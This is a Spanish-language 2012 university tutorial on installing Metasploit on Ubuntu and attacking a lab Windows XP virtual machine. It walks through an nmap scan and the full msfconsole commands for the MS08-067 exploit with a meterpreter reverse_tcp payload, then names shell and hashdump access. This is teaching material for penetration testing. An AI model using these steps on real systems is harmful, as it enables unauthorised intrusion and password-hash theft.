Sie sind auf Seite 1von 11

MANUAL BSICO DEL USO DE METASPLOIT

FRAMEWORK EN UBUNTU 12.10


William Caldern y Javier Senz
Universidad Nacional de Colombia
2012
CONTENIDO
1. DEFINICIONES
2. INSTALACIN
3. ACTUALIZACIN
3. INTERFACES
4. ATAQUE Y OPCIONES
5. CONCLUSIONES
1. DEFINICIONES
METASPLOIT
Es una herramienta de software abierto de seguridad informtica para el desarrollo, pruebas, mejora y
penetracin a diversos sistemas operativos,
Metasploit se ejecuta bajo una consola CYGWIN y trabaja con una base de datos en la cual se encuentran
toda la lista de exploits y vulnerabilidades, lo nico que tenemos que indicarle a metasploit es que
vulnerabilidad utilizaremos, que sistema atacaremos, que tipo de ataque utilizaremos y datos diversos que
utilizar para atacar al host.
Se llama Metasploit Framework por que es todo un entorno de pruebas para diversas plataformas, la cual
trabaja con libreras, bases de datos, y diversos programas, shell codes, etc. Por tal deja de ser un simple
software si no un framework.

PEN-TESTING
Un Penetration Testing o Test de Penetracin, es un procedimiento metodolgico y sistemtico en el
que se simula un ataque real a una red o sistema, con el fin de descubrir y reparar sus problemas de
seguridad

2. INSTALACIN
Descargamos directamente de la pgina oficial el instalador de Metasploit Framework dando click en el
siguiente enlace http://www.metasploit.com/download/ y escogiendo la versin 32 bits o 64 bits segn
sea el caso.

Vamos a una Terminal y escribimos


chmod +x metasploit-latest-linux-x64-installer.run
sudo ./metasploit-latest-linux-x64-installer.run

3. ACTUALIZACIN
Despus de terminar la instalacin (varios Siguientes y Finalizar) procedemos a actualizar el
framework.
De nuevo en la Terminal escribimos
sudo msfupdate
y esperamos a que finalice con
Updated to revision XXXXX.

4. INTERFACES
4.1 MODO GUI
Escribimos
sudo msfgui

4.2 MODO CONSOLA


Escribimos
sudo msfconsole

5. ATAQUE Y OPCIONES
Trabajaremos nuestro metasploit por medio de la consola y directamente en un ataque a un Windows
XP SP3 instalado como mquina virtual con el firewall desactivado.
Inicialmente y antes de abrir nuestro metasploit debemos escanear nuestra red LAN.
sudo nmap -O 192.168.0.1/24
Tenemos como resultado
Starting Nmap 6.00 ( http://nmap.org ) at 2012-11-29 01:27 COT
Nmap scan report for 192.168.0.18
Host is up (0.00050s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
VERSION
135/tcp open msrpc
Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:A2:3F:80 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: USUARIO-7A1D458, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:a2:3f:80
(Cadmus Computer Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Computer name: usuario-7a1d458
| NetBIOS computer name: USUARIO-7A1D458
| Workgroup: GRUPO_TRABAJO
|_ System time: 2012-11-29 01:27:20 UTC-5
TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 192.168.0.18

Como se puede ver, el puerto 445 se encuentra abierto, y existe un exploit que permite hacer uso de
este puerto para controlar ese sistema remotamente.

Ahora, vamos al METASPLOIT en modo consola


sudo msfconsole
Podemos inicialmente ver la cantidad de exploits existentes en el framework con:
show exploits

Teniendo en cuenta la informacin obtenida con NMAP es bien sabido que el puerto 445 se puede
atacar con el exploit ms08_067_netapi. Escribimos
search exploit ms08_067_netapi
Teniendo como resultado el lugar donde se guarda el exploit.
Matching Modules
================
Name
Disclosure Date
Rank Description
--------------------- ----------exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path
Stack Corruption

Escogemos el exploit
use exploit/windows/smb/ms08_067_netapi

Acto seguido debemos elegir el PAYLOAD (lo que queremos recibir despus de realizar el ataque).
Podemos elegir bind shells o reverse shells. Existe tambin el payload llamado METERPRETER
(definir).
Para ver los payloads existentes
show payloads
Digitamos el comando para elegir nuestro payload.
set payload windows/meterpreter/reverse_tcp

Ahora que informacin especfica requiere el exploit y el payload?


show options

Hace falta RHOST (direccin IP de la vctima) y LHOST (direccin IP del atacante)


Tenemos la IP de la vctima:

Definimos entonces
set RHOST 192.168.0.18
set LHOST 192.168.0.5

Y ATACAMOS
exploit

Tenemos control de la mquina !!

Vemos las diversas opciones de METERPRETER.


meterpreter> help

Por lo que vemos existen muchas opciones, tales como SHELL (obtenemos un CMD de la mquina),
HASHDUMP (obtenemos los hash de las claves de usuario del sistema), SCREENSHOT (tomamos un
pantallazo de la mquina), entre muchos otros.
SHELL

HASHDUMP

IFCONFIG (verificamos que estamos dentro)

5. CONCLUSIONES

Metasploit es una herramienta muy til para realizar diferentes pruebas a un sistema y de esta
manera identificar debilidades.

Al ser una herramienta de software libre nos permite realizar modificaciones al cdigo fuente y
mantener siempre actualizada la herramienta.

Debido a que es una herramienta de libre acceso se presta para que usuarios malintencionados
hagan mal uso de la misma.

Para la realizacin de una auditoria de un sistema se debe realizar inicialmente un Information


Gathering para despus saber que ataque realizar. Es necesario decirle a la Metasploit que tipo
de ataque usar o de lo contrario no tendr efectividad.

Das könnte Ihnen auch gefallen